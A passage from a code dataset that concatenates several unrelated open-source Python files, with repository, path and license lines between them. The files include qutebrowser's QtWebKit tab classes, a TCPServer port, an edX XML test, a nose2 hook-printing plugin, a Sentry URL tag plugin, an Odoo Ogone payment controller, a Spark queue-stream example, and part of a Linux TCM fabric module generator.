# self._widget.setFocus()
for _ in range(min(count, 5000)):
# Abort scrolling if the minimum/maximum was reached.
if (getter is not None and
frame.scrollBarValue(direction) == getter(direction)):
return
self._tab.key_press(key)
def up(self, count=1):
self._key_press(Qt.Key_Up, count, 'scrollBarMinimum', Qt.Vertical)
def down(self, count=1):
self._key_press(Qt.Key_Down, count, 'scrollBarMaximum', Qt.Vertical)
def left(self, count=1):
self._key_press(Qt.Key_Left, count, 'scrollBarMinimum', Qt.Horizontal)
def right(self, count=1):
self._key_press(Qt.Key_Right, count, 'scrollBarMaximum', Qt.Horizontal)
def top(self):
self._key_press(Qt.Key_Home)
def bottom(self):
self._key_press(Qt.Key_End)
def page_up(self, count=1):
self._key_press(Qt.Key_PageUp, count, 'scrollBarMinimum', Qt.Vertical)
def page_down(self, count=1):
self._key_press(Qt.Key_PageDown, count, 'scrollBarMaximum',
Qt.Vertical)
def at_top(self):
return self.pos_px().y() == 0
def at_bottom(self):
frame = self._widget.page().currentFrame()
return self.pos_px().y() >= frame.scrollBarMaximum(Qt.Vertical)
class WebKitHistory(browsertab.AbstractHistory):
"""QtWebKit implementations related to page history."""
def current_idx(self):
return self._history.currentItemIndex()
def back(self):
self._history.back()
def forward(self):
self._history.forward()
def can_go_back(self):
return self._history.canGoBack()
def can_go_forward(self):
return self._history.canGoForward()
def serialize(self):
return qtutils.serialize(self._history)
def deserialize(self, data):
return qtutils.deserialize(data, self._history)
def load_items(self, items):
stream, _data, user_data = tabhistory.serialize(items)
qtutils.deserialize_stream(stream, self._history)
for i, data in enumerate(user_data):
self._history.itemAt(i).setUserData(data)
cur_data = self._history.currentItem().userData()
if cur_data is not None:
if 'zoom' in cur_data:
self._tab.zoom.set_factor(cur_data['zoom'])
if ('scroll-pos' in cur_data and
self._tab.scroller.pos_px() == QPoint(0, 0)):
QTimer.singleShot(0, functools.partial(
self._tab.scroller.to_point, cur_data['scroll-pos']))
class WebKitElements(browsertab.AbstractElements):
"""QtWebKit implemementations related to elements on the page."""
def find_css(self, selector, callback, *, only_visible=False):
mainframe = self._widget.page().mainFrame()
if mainframe is None:
raise browsertab.WebTabError("No frame focused!")
elems = []
frames = webkitelem.get_child_frames(mainframe)
for f in frames:
for elem in f.findAllElements(selector):
elems.append(webkitelem.WebKitElement(elem, tab=self._tab))
if only_visible:
# pylint: disable=protected-access
elems = [e for e in elems if e._is_visible(mainframe)]
# pylint: enable=protected-access
callback(elems)
def find_id(self, elem_id, callback):
def find_id_cb(elems):
if not elems:
callback(None)
else:
callback(elems[0])
self.find_css('#' + elem_id, find_id_cb)
def find_focused(self, callback):
frame = self._widget.page().currentFrame()
if frame is None:
callback(None)
return
elem = frame.findFirstElement('*:focus')
if elem.isNull():
callback(None)
else:
callback(webkitelem.WebKitElement(elem, tab=self._tab))
def find_at_pos(self, pos, callback):
assert pos.x() >= 0
assert pos.y() >= 0
frame = self._widget.page().frameAt(pos)
if frame is None:
# This happens when we click inside the webview, but not actually
# on the QWebPage - for example when clicking the scrollbar
# sometimes.
log.webview.debug("Hit test at {} but frame is None!".format(pos))
callback(None)
return
# You'd think we have to subtract frame.geometry().topLeft() from the
# position, but it seems QWebFrame::hitTestContent wants a position
# relative to the QWebView, not to the frame. This makes no sense to
# me, but it works this way.
hitresult = frame.hitTestContent(pos)
if hitresult.isNull():
# For some reason, the whole hit result can be null sometimes (e.g.
# on doodle menu links).
log.webview.debug("Hit test result is null!")
callback(None)
return
try:
elem = webkitelem.WebKitElement(hitresult.element(), tab=self._tab)
except webkitelem.IsNullError:
# For some reason, the hit result element can be a null element
# sometimes (e.g. when clicking the timetable fields on
# http://www.sbb.ch/ ).
log.webview.debug("Hit test result element is null!")
callback(None)
return
callback(elem)
class WebKitTab(browsertab.AbstractTab):
"""A QtWebKit tab in the browser."""
def __init__(self, *, win_id, mode_manager, private, parent=None):
super().__init__(win_id=win_id, mode_manager=mode_manager,
private=private, parent=parent)
widget = webview.WebView(win_id=win_id, tab_id=self.tab_id,
private=private, tab=self)
if private:
self._make_private(widget)
self.history = WebKitHistory(self)
self.scroller = WebKitScroller(self, parent=self)
self.caret = WebKitCaret(win_id=win_id, mode_manager=mode_manager,
tab=self, parent=self)
self.zoom = WebKitZoom(win_id=win_id, parent=self)
self.search = WebKitSearch(parent=self)
self.printing = WebKitPrinting()
self.elements = WebKitElements(self)
self.action = WebKitAction()
self._set_widget(widget)
self._connect_signals()
self.backend = usertypes.Backend.QtWebKit
def _install_event_filter(self):
self._widget.installEventFilter(self._mouse_event_filter)
def _make_private(self, widget):
settings = widget.settings()
settings.setAttribute(QWebSettings.PrivateBrowsingEnabled, True)
def openurl(self, url):
self._openurl_prepare(url)
self._widget.openurl(url)
def url(self, requested=False):
frame = self._widget.page().mainFrame()
if requested:
return frame.requestedUrl()
else:
return frame.url()
def dump_async(self, callback, *, plain=False):
frame = self._widget.page().mainFrame()
if plain:
callback(frame.toPlainText())
else:
callback(frame.toHtml())
def run_js_async(self, code, callback=None, *, world=None):
if world is not None and world != usertypes.JsWorld.jseval:
log.webview.warning("Ignoring world ID {}".format(world))
document_element = self._widget.page().mainFrame().documentElement()
result = document_element.evaluateJavaScript(code)
if callback is not None:
callback(result)
def icon(self):
return self._widget.icon()
def shutdown(self):
self._widget.shutdown()
def reload(self, *, force=False):
if force:
action = QWebPage.ReloadAndBypassCache
else:
action = QWebPage.Reload
self._widget.triggerPageAction(action)
def stop(self):
self._widget.stop()
def title(self):
return self._widget.title()
def clear_ssl_errors(self):
self.networkaccessmanager().clear_all_ssl_errors()
def key_press(self, key, modifier=Qt.NoModifier):
press_evt = QKeyEvent(QEvent.KeyPress, key, modifier, 0, 0, 0)
release_evt = QKeyEvent(QEvent.KeyRelease, key, modifier,
0, 0, 0)
self.send_event(press_evt)
self.send_event(release_evt)
@pyqtSlot()
def _on_history_trigger(self):
url = self.url()
requested_url = self.url(requested=True)
self.add_history_item.emit(url, requested_url, self.title())
def set_html(self, html, base_url=QUrl()):
self._widget.setHtml(html, base_url)
def networkaccessmanager(self):
return self._widget.page().networkAccessManager()
def user_agent(self):
page = self._widget.page()
return page.userAgentForUrl(self.url())
@pyqtSlot()
def _on_frame_load_finished(self):
"""Make sure we emit an appropriate status when loading finished.
While Qt has a bool "ok" attribute for loadFinished, it always is True
when using error pages... See
https://github.com/qutebrowser/qutebrowser/issues/84
"""
self._on_load_finished(not self._widget.page().error_occurred)
@pyqtSlot()
def _on_webkit_icon_changed(self):
"""Emit iconChanged with a QIcon like QWebEngineView does."""
if sip.isdeleted(self._widget):
log.webview.debug("Got _on_webkit_icon_changed for deleted view!")
return
self.icon_changed.emit(self._widget.icon())
@pyqtSlot(QWebFrame)
def _on_frame_created(self, frame):
"""Connect the contentsSizeChanged signal of each frame."""
# FIXME:qtwebengine those could theoretically regress:
# https://github.com/qutebrowser/qutebrowser/issues/152
# https://github.com/qutebrowser/qutebrowser/issues/263
frame.contentsSizeChanged.connect(self._on_contents_size_changed)
@pyqtSlot(QSize)
def _on_contents_size_changed(self, size):
self.contents_size_changed.emit(QSizeF(size))
def _connect_signals(self):
view = self._widget
page = view.page()
frame = page.mainFrame()
page.windowCloseRequested.connect(self.window_close_requested)
page.linkHovered.connect(self.link_hovered)
page.loadProgress.connect(self._on_load_progress)
frame.loadStarted.connect(self._on_load_started)
view.scroll_pos_changed.connect(self.scroller.perc_changed)
view.titleChanged.connect(self.title_changed)
view.urlChanged.connect(self._on_url_changed)
view.shutting_down.connect(self.shutting_down)
page.networkAccessManager().sslErrors.connect(self._on_ssl_errors)
frame.loadFinished.connect(self._on_frame_load_finished)
view.iconChanged.connect(self._on_webkit_icon_changed)
page.frameCreated.connect(self._on_frame_created)
frame.contentsSizeChanged.connect(self._on_contents_size_changed)
frame.initialLayoutCompleted.connect(self._on_history_trigger)
def event_target(self):
return self._widget
|
gpl-3.0
|
shopmium/titanium_mobile
|
support/android/tcpserver.py
|
37
|
7728
|
#
# BaseServer and TCPServer copied from Python 2.6 to be compatible w/ Python 2.5
#
import os, sys, socket
import select, threading, urllib
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__serving = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__serving = False
self.__is_shut_down.wait()
def shutdown_noblock(self):
""" Stops the server_forever loop but without blocking """
self.__serving = False
def is_serving(self):
return self.__serving
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.close_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
def finish(self):
pass
|
apache-2.0
|
abo-abo/edx-platform
|
common/lib/xmodule/xmodule/tests/xml/test_inheritance.py
|
49
|
1071
|
"""
Test that inherited fields work correctly when parsing XML
"""
from nose.tools import assert_equals # pylint: disable=no-name-in-module
from xmodule.tests.xml import XModuleXmlImportTest
from xmodule.tests.xml.factories import CourseFactory, SequenceFactory, ProblemFactory
class TestInheritedFieldParsing(XModuleXmlImportTest):
"""
Test that inherited fields work correctly when parsing XML
"""
def test_null_string(self):
# Test that the string inherited fields are passed through 'deserialize_field',
# which converts the string "null" to the python value None
root = CourseFactory.build(days_early_for_beta="null")
sequence = SequenceFactory.build(parent=root)
ProblemFactory.build(parent=sequence)
course = self.process_xml(root)
assert_equals(None, course.days_early_for_beta)
sequence = course.get_children()[0]
assert_equals(None, sequence.days_early_for_beta)
problem = sequence.get_children()[0]
assert_equals(None, problem.days_early_for_beta)
|
agpl-3.0
|
dhenrygithub/QGIS
|
python/ext-libs/nose2/plugins/printhooks.py
|
11
|
1767
|
"""
This plugin is primarily useful for plugin authors who want to debug
their plugins.
It prints each hook that is called to stderr, along with details of
the event that was passed to the hook.
To do that, this plugin overrides :meth:`nose2.events.Plugin.register`
and, after registration, replaces all existing
:class:`nose2.events.Hook` instances in ``session.hooks`` with
instances of a Hook subclass that prints information about each call.
"""
import sys
from nose2 import events
INDENT = []
__unittest = True
class PrintHooks(events.Plugin):
"""Print hooks as they are called"""
configSection = 'print-hooks'
commandLineSwitch = ('P', 'print-hooks',
'Print names of hooks in order of execution')
def register(self):
"""Override to inject noisy hook instances.
Replaces Hook instances in ``self.session.hooks.hooks`` with
noisier objects.
"""
super(PrintHooks, self).register()
# now we can be sure that all other plugins have loaded
# and this plugin is active, patch in our hook class
self.session.hooks.hookClass = NoisyHook
for attr, hook in self.session.hooks.hooks.items():
newhook = NoisyHook(attr)
newhook.plugins = hook.plugins
self.session.hooks.hooks[attr] = newhook
class NoisyHook(events.Hook):
def __call__(self, event):
_report(self.method, event)
_indent()
try:
return super(NoisyHook, self).__call__(event)
finally:
_dedent()
def _report(method, event):
sys.stderr.write("\n%s%s: %s" % (''.join(INDENT), method, event))
def _indent():
INDENT.append(' ')
def _dedent():
if INDENT:
INDENT.pop()
|
gpl-2.0
|
JTCunning/sentry
|
src/sentry/plugins/sentry_urls/models.py
|
13
|
1027
|
"""
sentry.plugins.sentry_urls.models
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import sentry
from django.utils.translation import ugettext_lazy as _
from sentry.plugins import register
from sentry.plugins.bases.tag import TagPlugin
class UrlsPlugin(TagPlugin):
"""
Automatically adds the 'url' tag from events containing interface data
from ``sentry.interfaces.Http``.
"""
slug = 'urls'
title = _('Auto Tag: URLs')
version = sentry.VERSION
author = "Sentry Team"
author_url = "https://github.com/getsentry/sentry"
tag = 'url'
tag_label = _('URL')
project_default_enabled = True
def get_tag_values(self, event):
http = event.interfaces.get('sentry.interfaces.Http')
if not http:
return []
if not http.url:
return []
return [http.url]
register(UrlsPlugin)
|
bsd-3-clause
|
LeartS/odoo
|
addons/payment_ogone/controllers/main.py
|
389
|
1179
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class OgoneController(http.Controller):
_accept_url = '/payment/ogone/test/accept'
_decline_url = '/payment/ogone/test/decline'
_exception_url = '/payment/ogone/test/exception'
_cancel_url = '/payment/ogone/test/cancel'
@http.route([
'/payment/ogone/accept', '/payment/ogone/test/accept',
'/payment/ogone/decline', '/payment/ogone/test/decline',
'/payment/ogone/exception', '/payment/ogone/test/exception',
'/payment/ogone/cancel', '/payment/ogone/test/cancel',
], type='http', auth='none')
def ogone_form_feedback(self, **post):
""" Ogone contacts using GET, at least for accept """
_logger.info('Ogone: entering form_feedback with post data %s', pprint.pformat(post)) # debug
cr, uid, context = request.cr, SUPERUSER_ID, request.context
request.registry['payment.transaction'].form_feedback(cr, uid, post, 'ogone', context=context)
return werkzeug.utils.redirect(post.pop('return_url', '/'))
|
agpl-3.0
|
rednaxelafx/apache-spark
|
examples/src/main/python/streaming/queue_stream.py
|
150
|
1763
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Create a queue of RDDs that will be mapped/reduced one at a time in
1 second intervals.
To run this example use
`$ bin/spark-submit examples/src/main/python/streaming/queue_stream.py
"""
import time
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
sc = SparkContext(appName="PythonStreamingQueueStream")
ssc = StreamingContext(sc, 1)
# Create the queue through which RDDs can be pushed to
# a QueueInputDStream
rddQueue = []
for i in range(5):
rddQueue += [ssc.sparkContext.parallelize([j for j in range(1, 1001)], 10)]
# Create the QueueInputDStream and use it do some processing
inputStream = ssc.queueStream(rddQueue)
mappedStream = inputStream.map(lambda x: (x % 10, 1))
reducedStream = mappedStream.reduceByKey(lambda a, b: a + b)
reducedStream.pprint()
ssc.start()
time.sleep(6)
ssc.stop(stopSparkContext=True, stopGraceFully=True)
|
apache-2.0
|
vasudev-33/os
|
Documentation/target/tcm_mod_builder.py
|
3119
|
42754
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: [email protected]
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!(se_nacl_new))\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
